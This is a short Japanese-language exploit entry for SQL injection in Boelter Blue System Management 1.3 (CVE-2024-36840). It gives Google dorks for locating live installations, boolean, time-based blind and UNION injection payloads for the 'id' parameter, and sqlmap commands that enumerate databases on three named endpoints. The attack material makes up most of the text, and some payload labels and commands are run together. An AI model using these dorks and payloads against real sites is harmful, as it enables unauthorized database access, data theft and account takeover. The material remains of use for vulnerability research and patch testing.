
# エクスプロイト対象: CVE-2024-36840: Boelter Blue System Management (バージョン 1.3) におけるSQLインジェクションの脆弱性
エクスプロイトタイトル: Boelter Blue System Management(バージョン1.3)におけるSQLインジェクションの脆弱性
元のGoogle Dork: inurl:"Powered by Boelter Blue"(動作しませんでした(検索結果にURLがゼロ件))
TheexploitersによるGoogle Dork: intext:"Powered by Boelter Blue"(動作します)
日付: 2024-06-04
エクスプロイト作成者: CBKB (DeadlyData, R4d1x)
ベンダーホームページ: Boelter Blue
ソフトウェアリンク: Google Play Store
バージョン: 1.3
テスト環境: Linux Debian 9 (stretch)、Apache 2.4.25、MySQL >= 5.0.12
CVE: CVE-2024-36840
Boelter Blue System Management(バージョン1.3)において、複数のSQLインジェクションの脆弱性が確認されています。これらの脆弱性により、攻撃者は様々なパラメータを通じて任意のSQLコマンドを注入・実行することが可能です。悪用に成功した場合、不正アクセス、データの外部流出、およびアカウント乗っ取りの可能性が生じます。
パラメータ: id (GET)
id=10071 AND 4036=4036タイプ: 時間ベースのブラインド
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)タイプ: UNIONクエリ
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs